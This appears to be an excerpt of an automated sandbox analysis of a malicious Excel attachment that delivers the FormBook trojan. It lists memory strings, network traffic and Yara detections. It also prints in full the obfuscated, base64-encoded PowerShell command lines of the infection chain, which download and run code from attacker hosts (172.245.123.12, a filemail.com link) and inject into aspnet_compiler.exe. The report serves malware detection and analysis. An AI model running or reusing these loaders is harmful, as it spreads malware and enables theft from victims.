Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta6X1
Source: mshta.exe, 00000004.00000002.489430363.000000000025A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaC:
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaE
Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaM
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaU
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htae
Source: mshta.exe, 00000004.00000003.487975537.0000000003335000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htahttp://172.245.123.12/361/sen/seemebestgood
Source: mshta.exe, 00000004.00000002.489430363.000000000022E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486065504.000000000027F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489381108.000000000027E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htastantial&rub=quick&sideboard=divergent&pett
Source: mshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htatial&rub=quick&sideboa
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htau
Source: mshta.exe, 00000004.00000002.489574568.00000000037D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.245.123.12/nt=5&recv=
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512506171.000000001A7A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.506928711.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.550062163.00000000020D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1016.filemail.com
Source: powershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://linkjago.me/
Source: mshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://linkjago.me/c
Source: mshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmp, PI-02911202409#.xla.xlsx, 50A30000.0.dr String found in binary or memory: https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&pet
Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Excel sheet contains many unusual embedded objects
Source: PI-02911202409#.xla.xlsx OLE: Microsoft Excel 2007+
Source: PI-02911202409#.xla.xlsx OLE: Microsoft Excel 2007+
Source: 50A30000.0.dr OLE: Microsoft Excel 2007+
Source: 50A30000.0.dr OLE: Microsoft Excel 2007+
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
